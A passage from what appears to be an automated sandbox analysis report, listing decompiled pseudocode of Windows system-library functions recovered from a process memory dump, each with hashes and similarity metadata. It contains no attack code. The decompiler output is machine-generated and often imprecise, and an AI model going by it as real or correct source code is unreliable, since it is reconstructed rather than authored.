                				intOrPtr _v40;
                				void* __ebx;
                				void* _t35;
                				signed int _t42;
                				char* _t48;
                				signed int _t59;
                				signed char _t61;
                				signed int* _t79;
                				void* _t88;
                
                				_v28 = __edx;
                				_t79 = __ecx;
                				if(E019607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                					L13:
                					_t35 = 0;
                					L14:
                					return _t35;
                				}
                				_t61 = __ecx[1];
                				_t59 = __ecx[0xf];
                				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                				_v36 = _a8 << 0xc;
                				_t42 =  *(_t59 + 0xc) & 0x40000000;
                				asm("sbb esi, esi");
                				_t88 = ( ~_t42 & 0x0000003c) + 4;
                				if(_t42 != 0) {
                					_push(0);
                					_push(0x14);
                					_push( &_v24);
                					_push(3);
                					_push(_t59);
                					_push(0xffffffff);
                					if(E018D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                						_push(_t61);
                						E0195A80D(_t59, 1, _v20, 0);
                						_t88 = 4;
                					}
                				}
                				_t35 = E0195A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                				if(_t35 < 0) {
                					goto L14;
                				}
                				E01961293(_t79, _v40, E019607DF(_t79, _v28,  &_a4,  &_a8, 1));
                				if(E018B7D50() == 0) {
                					_t48 = 0x7ffe0380;
                				} else {
                					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                				}
                				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                					E0195138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                				}
                				goto L13;
                			}
                Addresses (per-line address column, flattened): 0x019605c5-0x019606e3

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: `
                • API String ID: 0-2679148245
                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                • Instruction ID: 9c94b693a90e43bc64b9675ed46cc147436aa2d1349d3b54eb993dd44d087442
                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                • Instruction Fuzzy Hash: 0731C0326043466BE720DE29CD85F9A7B9DBBC4754F184229FA58AB2C0D770ED14CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E01913884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                				char _v8;
                				intOrPtr _v12;
                				intOrPtr* _v16;
                				char* _v20;
                				short _v22;
                				char _v24;
                				intOrPtr _t38;
                				short _t40;
                				short _t41;
                				void* _t44;
                				intOrPtr _t47;
                				void* _t48;
                
                				_v16 = __edx;
                				_t40 = 0x14;
                				_v24 = _t40;
                				_t41 = 0x16;
                				_v22 = _t41;
                				_t38 = 0;
                				_v12 = __ecx;
                				_push( &_v8);
                				_push(0);
                				_push(0);
                				_push(2);
                				_t43 =  &_v24;
                				_v20 = L"BinaryName";
                				_push( &_v24);
                				_push(__ecx);
                				_t47 = 0;
                				_t48 = E018D9650();
                				if(_t48 >= 0) {
                					_t48 = 0xc000090b;
                				}
                				if(_t48 != 0xc0000023) {
                					_t44 = 0;
                					L13:
                					if(_t48 < 0) {
                						L16:
                						if(_t47 != 0) {
                							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                						}
                						L18:
                						return _t48;
                					}
                					 *_v16 = _t38;
                					 *_a4 = _t47;
                					goto L18;
                				}
                				_t47 = L018B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                				if(_t47 != 0) {
                					_push( &_v8);
                					_push(_v8);
                					_push(_t47);
                					_push(2);
                					_push( &_v24);
                					_push(_v12);
                					_t48 = E018D9650();
                					if(_t48 < 0) {
                						_t44 = 0;
                						goto L16;
                					}
                					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                						_t48 = 0xc000090b;
                					}
                					_t44 = 0;
                					if(_t48 < 0) {
                						goto L16;
                					} else {
                						_t17 = _t47 + 0xc; // 0xc
                						_t38 = _t17;
                						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                							_t48 = 0xc000090b;
                						}
                						goto L13;
                					}
                				}
                				_t48 = _t48 + 0xfffffff4;
                				goto L18;
                			}
                Addresses (per-line address column, flattened): 0x01913893-0x0191396e

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: BinaryName
                • API String ID: 0-215506332
                • Opcode ID: fcb7f2b9d5a06e3eaf436c456e174efd45faf57d07424f37126ac934e4eb3a9c
                • Instruction ID: 8356551936df8b447f58e8eb8c4deb9af734fcf30d4d005b14836572e6faf5bb
                • Opcode Fuzzy Hash: fcb7f2b9d5a06e3eaf436c456e174efd45faf57d07424f37126ac934e4eb3a9c
                • Instruction Fuzzy Hash: 8431F472D0060EEFEB16DA5CC945D6BBB79FB80730F014169E919A7244D7309F40C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 33%
                			E018CD294(void* __ecx, char __edx, void* __eflags) {
                				signed int _v8;
                				char _v52;
                				signed int _v56;
                				signed int _v60;
                				intOrPtr _v64;
                				char* _v68;
                				intOrPtr _v72;
                				char _v76;
                				signed int _v84;
                				intOrPtr _v88;
                				char _v92;
                				intOrPtr _v96;
                				intOrPtr _v100;
                				char _v104;
                				char _v105;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t35;
                				char _t38;
                				signed int _t40;
                				signed int _t44;
                				signed int _t52;
                				void* _t53;
                				void* _t55;
                				void* _t61;
                				intOrPtr _t62;
                				void* _t64;
                				signed int _t65;
                				signed int _t66;
                
                				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                				_v8 =  *0x198d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                				_v105 = __edx;
                				_push( &_v92);
                				_t52 = 0;
                				_push(0);
                				_push(0);
                				_push( &_v104);
                				_push(0);
                				_t59 = __ecx;
                				_t55 = 2;
                				if(E018B4120(_t55, __ecx) < 0) {
                					_t35 = 0;
                					L8:
                					_pop(_t61);
                					_pop(_t64);
                					_pop(_t53);
                					return E018DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                				}
                				_v96 = _v100;
                				_t38 = _v92;
                				if(_t38 != 0) {
                					_v104 = _t38;
                					_v100 = _v88;
                					_t40 = _v84;
                				} else {
                					_t40 = 0;
                				}
                				_v72 = _t40;
                				_v68 =  &_v104;
                				_push( &_v52);
                				_v76 = 0x18;
                				_push( &_v76);
                				_v64 = 0x40;
                				_v60 = _t52;
                				_v56 = _t52;
                				_t44 = E018D98D0();
                				_t62 = _v88;
                				_t65 = _t44;
                				if(_t62 != 0) {
                					asm("lock xadd [edi], eax");
                					if((_t44 | 0xffffffff) != 0) {
                						goto L4;
                					}
                					_push( *((intOrPtr*)(_t62 + 4)));
                					E018D95D0();
                					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                					goto L4;
                				} else {
                					L4:
                					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                					if(_t65 >= 0) {
                						_t52 = 1;
                					} else {
                						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                						}
                					}
                					_t35 = _t52;
                					goto L8;
                				}
                			}
                Addresses (per-line address column, flattened): 0x018cd29c-0x018cd38c, with out-of-line blocks at 0x0190affe-0x0190b011

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 53ce8b0564b485c13b6e87bbece3317daafb414ea3b66a3ba7717a35bb26d95d
                • Instruction ID: eef6c4e756287343409da42fcf3f65814b504c60b7bd9eb39ff1636c21a4d0ce
                • Opcode Fuzzy Hash: 53ce8b0564b485c13b6e87bbece3317daafb414ea3b66a3ba7717a35bb26d95d
                • Instruction Fuzzy Hash: 84317EB15083459FC311EF68C9809ABBBE8EB95B58F000A2EF995C3251E634DE04CBD3
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E018A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                				intOrPtr _v8;
                				char _v16;
                				intOrPtr* _t26;
                				intOrPtr _t29;
                				void* _t30;
                				signed int _t31;
                
                				_t27 = __ecx;
                				_t29 = __edx;
                				_t31 = 0;
                				_v8 = __edx;
                				if(__edx == 0) {
                					L18:
                					_t30 = 0xc000000d;
                					goto L12;
                				} else {
                					_t26 = _a4;
                					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                						goto L18;
                					} else {
                						E018DBB40(__ecx,  &_v16, __ecx);
                						_push(_t26);
                						_push(0);
                						_push(0);
                						_push(_t29);
                						_push( &_v16);
                						_t30 = E018DA9B0();
                						if(_t30 >= 0) {
                							_t19 =  *_t26;
                							if( *_t26 != 0) {
                								goto L7;
                							} else {
                								 *_a8 =  *_a8 & 0;
                							}
                						} else {
                							if(_t30 != 0xc0000023) {
                								L9:
                								_push(_t26);
                								_push( *_t26);
                								_push(_t31);
                								_push(_v8);
                								_push( &_v16);
                								_t30 = E018DA9B0();
                								if(_t30 < 0) {
                									L12:
                									if(_t31 != 0) {
                										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                									}
                								} else {
                									 *_a8 = _t31;
                								}
                							} else {
                								_t19 =  *_t26;
                								if( *_t26 == 0) {
                									_t31 = 0;
                								} else {
                									L7:
                									_t31 = L018B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                								}
                								if(_t31 == 0) {
                									_t30 = 0xc0000017;
                								} else {
                									goto L9;
                								}
                							}
                						}
                					}
                				}
                				return _t30;
                			}
                Addresses (per-line address column, flattened): 0x018a1b8f-0x018a1c3e, with out-of-line blocks at 0x018f6ffc-0x018f7026

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: WindowsExcludedProcs
                • API String ID: 0-3583428290
                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                • Instruction ID: a33598813d55644a9b92a22f86c02ed58675cddc10b6dbbd8a8b1f15d33f6528
                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                • Instruction Fuzzy Hash: 3121073A500229EBFB229A5DC884F9BBBADEF91B54F154425FE04CB200D630DF00D7A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E018BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                				intOrPtr _t13;
                				intOrPtr _t14;
                				signed int _t16;
                				signed char _t17;
                				intOrPtr _t19;
                				intOrPtr _t21;
                				intOrPtr _t23;
                				intOrPtr* _t25;
                
                				_t25 = _a8;
                				_t17 = __ecx;
                				if(_t25 == 0) {
                					_t19 = 0xc00000f2;
                					L8:
                					return _t19;
                				}
                				if((__ecx & 0xfffffffe) != 0) {
                					_t19 = 0xc00000ef;
                					goto L8;
                				}
                				_t19 = 0;
                				 *_t25 = 0;
                				_t21 = 0;
                				_t23 = "Actx ";
                				if(__edx != 0) {
                					if(__edx == 0xfffffffc) {
                						L21:
                						_t21 = 0x200;
                						L5:
                						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                						 *_t25 = _t13;
                						L6:
                						if(_t13 == 0) {
                							if((_t17 & 0x00000001) != 0) {
                								 *_t25 = _t23;
                							}
                						}
                						L7:
                						goto L8;
                					}
                					if(__edx == 0xfffffffd) {
                						 *_t25 = _t23;
                						_t13 = _t23;
                						goto L6;
                					}
                					_t13 =  *((intOrPtr*)(__edx + 0x10));
                					 *_t25 = _t13;
                					L14:
                					if(_t21 == 0) {
                						goto L6;
                					}
                					goto L5;
                				}
                				_t14 = _a4;
                				if(_t14 != 0) {
                					_t16 =  *(_t14 + 0x14) & 0x00000007;
                					if(_t16 <= 1) {
                						_t21 = 0x1f8;
                						_t13 = 0;
                						goto L14;
                					}
                					if(_t16 == 2) {
                						goto L21;
                					}
                					if(_t16 != 4) {
                						_t19 = 0xc00000f0;
                						goto L7;
                					}
                					_t13 = 0;
                					goto L6;
                				} else {
                					_t21 = 0x1f8;
                					goto L5;
                				}
                			}

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Actx
                • API String ID: 0-89312691
                • Opcode ID: b15f9f6834c29866325dc1be86fed4ca8998cf5f82887a021da949602704adab
                • Instruction ID: 607d4d6c51d26aaebcc1e9afe97864a1c212ce75d89abde95c2880d185bfec23
                • Opcode Fuzzy Hash: b15f9f6834c29866325dc1be86fed4ca8998cf5f82887a021da949602704adab
                • Instruction Fuzzy Hash: 9A11E6343046869BE7254E1D8CD07F677D5EB85328F2445AAEB65CB392D770DA40C348
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E01948DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                				intOrPtr _t35;
                				void* _t41;
                
                				_t40 = __esi;
                				_t39 = __edi;
                				_t38 = __edx;
                				_t35 = __ecx;
                				_t34 = __ebx;
                				_push(0x74);
                				_push(0x1970d50);
                				E018ED0E8(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                					E01925720(0x65, 0, "Critical error detected %lx\n", _t35);
                					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                						asm("int3");
                						 *(_t41 - 4) = 0xfffffffe;
                					}
                				}
                				 *(_t41 - 4) = 1;
                				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                				 *((intOrPtr*)(_t41 - 0x64)) = L018EDEF0;
                				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                				_push(_t41 - 0x70);
                				L018EDEF0(1, _t38);
                				 *(_t41 - 4) = 0xfffffffe;
                				return E018ED130(_t34, _t39, _t40);
                			}

                Strings
                • Critical error detected %lx, xrefs: 01948E21
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Critical error detected %lx
                • API String ID: 0-802127002
                • Opcode ID: 4a1a13dfd193d1f70d7383fe6edabcf369d07fd5377357fe30ba7320ba2d69d1
                • Instruction ID: b42f070ff4e1db67269cff90b9d78584fcba59adaaee2f017ce7af9a913c20b0
                • Opcode Fuzzy Hash: 4a1a13dfd193d1f70d7383fe6edabcf369d07fd5377357fe30ba7320ba2d69d1
                • Instruction Fuzzy Hash: 71117571D04348EBDF24EFE88509BADBBB4AB05711F24421EE52CAB282C3345606CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0192FF60
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                • API String ID: 0-1911121157
                • Opcode ID: ab0d52a26dac6d310397df8aeba0664abf36052be808018bacaf27112d1b15d2
                • Instruction ID: 005ba546abf523da495e4ba0bdf3a2475e2f76e94429b83c5d0d07ce755fe3a9
                • Opcode Fuzzy Hash: ab0d52a26dac6d310397df8aeba0664abf36052be808018bacaf27112d1b15d2
                • Instruction Fuzzy Hash: 9C110471910154EFEB22EF58C948FD8BBB1FF09705F158044E5089B265C7389A44CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 849be5b40bd74deaa9172c59144972b32647bb34b70a6fa3cd3585fe1a4d9dee
                • Instruction ID: cc45425e9a353f23b6fca8f65ef3eab8ee1fc2b05c6a96234e79a15140d54800
                • Opcode Fuzzy Hash: 849be5b40bd74deaa9172c59144972b32647bb34b70a6fa3cd3585fe1a4d9dee
                • Instruction Fuzzy Hash: 7A31C371A0021AABDF159F68CD81ABFB7B9EF14700F05406EF905E7250E7789B11DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f118349e75d5ef80f1e865ac86579465442a30d2da935df0b21033acafd9f0d5
                • Instruction ID: 6927a7d1cede0ea7b36809f4d2966ee81a6f73ea98ea8d536711644d67cbd64b
                • Opcode Fuzzy Hash: f118349e75d5ef80f1e865ac86579465442a30d2da935df0b21033acafd9f0d5
                • Instruction Fuzzy Hash: BB31F3322053519FD732AF58C980B2ABBE5FFC5714F404429E556DBA81CB70DA00CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf997a9c5743d79840319d050ac456317a608eccd849fd3f7d57debed4ce7de2
                • Instruction ID: e212c45846da9bc63c05ae9bf70e9a79d4c99f7b4a2153d63c6298461f6bdc0b
                • Opcode Fuzzy Hash: bf997a9c5743d79840319d050ac456317a608eccd849fd3f7d57debed4ce7de2
                • Instruction Fuzzy Hash: DE4180B1D003189EDB24CFAAD981AADFBF8FB48710F5081AEE509E7640D7749A84CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd118d5a15fff799a96d4ccb017008d7fa3d6b1313ebe1b95710bc7a0f3b7e4e
                • Instruction ID: da89dcd52666d935d57c5b22196170a8514c6c50d75a42b31f11aa589d54e5f9
                • Opcode Fuzzy Hash: fd118d5a15fff799a96d4ccb017008d7fa3d6b1313ebe1b95710bc7a0f3b7e4e
                • Instruction Fuzzy Hash: 65319175A14249EFD744CF58D845F9ABBE8FB09714F14825AF908CB341D631EE90CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 59712e7083472af6e73383cfa998e92633a0156386cd0b2ad825ed68278682cc
                • Instruction ID: 23cc21add9d58f08ff7b6c1b71dff4bebe4a60aa4419d36b8c7049e87daf9ae8
                • Opcode Fuzzy Hash: 59712e7083472af6e73383cfa998e92633a0156386cd0b2ad825ed68278682cc
                • Instruction Fuzzy Hash: CA310132A04A169FDB11DF9CD4817AA73B4FF18751F040078EE09DF246EB74DA068B81
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c6a33386deaed6b945917c8750e4433737ec545df5cd35286b0f1a4bf0dcdb29
                • Instruction ID: 59bd473253e098a7c8e36dce228d12d5ccf71aaeb22334ed6d5ac7d8a0cfc478
                • Opcode Fuzzy Hash: c6a33386deaed6b945917c8750e4433737ec545df5cd35286b0f1a4bf0dcdb29
                • Instruction Fuzzy Hash: 6431A2B1E05A45DFDF26DB6CC0887ACBBB5BB88358F1C815DC518E7241C338AA80C762
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                • Instruction ID: e8c02f38bb09b7f5d84d09fbcf757e8378d33c0cadf3728fbab54b9c232be164
                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                • Instruction Fuzzy Hash: 99215A72A00219EBD721CF99DCC4EAABBB9EB85B44F114059EA05DB251D634EE01DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1f08f419afb645c6614713fb31685d98ed29e065b8be2abf98015ec91fea819f
                • Instruction ID: 138772ae863a055effe8eb337f6610ae7b169a50b027eddc5d354226feacc0f9
                • Opcode Fuzzy Hash: 1f08f419afb645c6614713fb31685d98ed29e065b8be2abf98015ec91fea819f
                • Instruction Fuzzy Hash: 01316B31601B088FD726CF28C880B9AB7F5FB89714F14456DE596C7790EB75AA02CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d3ae05d4765f7c826317464cc1830276af8af14521d8c6e0fdd0a159e4a043
                • Instruction ID: 3206d8f8e9f5fda8453987bd863f41cd4e87dd0606c67a8eb25e34d131da3586
                • Opcode Fuzzy Hash: a3d3ae05d4765f7c826317464cc1830276af8af14521d8c6e0fdd0a159e4a043
                • Instruction Fuzzy Hash: 4E217A72E00649ABD715DB6CD980F6AB7B8FF48740F140069FA09DB791D634EE50CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                • Instruction ID: 53c490729f599305a19294d3c719a3cf7fb84640ec5f39dcebb3ca10e8080330
                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                • Instruction Fuzzy Hash: 78218371A00709EFDB21DF69C444A9AFBF8EB54714F14847AEA49D7241D334EE40CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e6d0421939be1f5c61bc8c7ef7fe4ece0026124c3ea7af78b3f16f06a3a51ae7
                • Instruction ID: 1efa02d8f3038313b8cfebe6e20c08d5a8692c468344f0107680a155eccb6805
                • Opcode Fuzzy Hash: e6d0421939be1f5c61bc8c7ef7fe4ece0026124c3ea7af78b3f16f06a3a51ae7
                • Instruction Fuzzy Hash: F4217F72A00119AFD715DF58CD81B5EBBADFB44708F154068EA09EB252D371EE129BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 13c8f5aead2c77a2985871782bb820fb8a2b9d37833d9be9dd4f7ddf1454b9d5
                • Instruction ID: 4924bfb5651437e31498c2ff14e953ef12a6b8898aaacd3870cc137ac8c12ae4
                • Opcode Fuzzy Hash: 13c8f5aead2c77a2985871782bb820fb8a2b9d37833d9be9dd4f7ddf1454b9d5
                • Instruction Fuzzy Hash: 5B21D3729003499BD711DF2CCD84FA7BBECAF91740F44095ABA44C7265D774D688C6A2
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                • Instruction ID: f727ecf83ffaabd910c585027ebef8bb499b21f35e1492b3f954f1ced012d565
                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                • Instruction Fuzzy Hash: A421F2362042009FD705DF18CC80B6ABBA9FBD4750F088669F9999B385D634DD09CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1273338e02ca374a511ad2edb0a908a9e6f03e1ad763894d836d26b2690230ab
                • Instruction ID: 7a4ca68a6dbdcd7fc3f7cd857ec905e000f28d4c4681abaee2ba7b46a7556288
                • Opcode Fuzzy Hash: 1273338e02ca374a511ad2edb0a908a9e6f03e1ad763894d836d26b2690230ab
                • Instruction Fuzzy Hash: B921A772500645ABC725DF9DD880E6BB7BDEF48340F10056DF60AC7750D634D900CB95
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                • Instruction ID: 8da6037801a40e82b0d70156a2a3cbd12220b36357fc7af6756afc04e3eb4e80
                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                • Instruction Fuzzy Hash: 3821C2326016859FE7179B6CC988B6577E9AF44354F1900A1DD08CB7D2D734ED40C691
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                • Instruction ID: 4632b9678a4c2566def71645d84ca798a823450348000b8bc05b12e8bfa9614a
                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                • Instruction Fuzzy Hash: B4215772A00A45DBE731CF0EC540AA6B7A6EB94F10F24816EEA49CB611D730EE00DB80
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 381f58eeeba35f8db307be19637a80f5f00680dc4c051e8a984b2fbeaece2eeb
                • Instruction ID: 073dee562ce17de7147e52562f37b04d96c3a01d16b96e253786ac2debf5d379
                • Opcode Fuzzy Hash: 381f58eeeba35f8db307be19637a80f5f00680dc4c051e8a984b2fbeaece2eeb
                • Instruction Fuzzy Hash: DF116B333116109FCB2ADA288D81A6BB3DBEBC5770B29012DDD1ADB3C0C931AD02C6D5
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d445943ac8dde637b053753cd6f9fe703fdddd489d6e11fe9e83a15ea03c4e7b
                • Instruction ID: 5692cd65bbe0877c1c985cc389e9346f327942b9aaf3b35fc9edd99be7c42311
                • Opcode Fuzzy Hash: d445943ac8dde637b053753cd6f9fe703fdddd489d6e11fe9e83a15ea03c4e7b
                • Instruction Fuzzy Hash: 14215932440641DFC722EF6CCA40F59B7F9BF18708F58456CE009CA6A2CB34EA41DB55
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 56e901da980c7ec2889dac64ee9403ad38e95dd20983d362302569072be54aaa
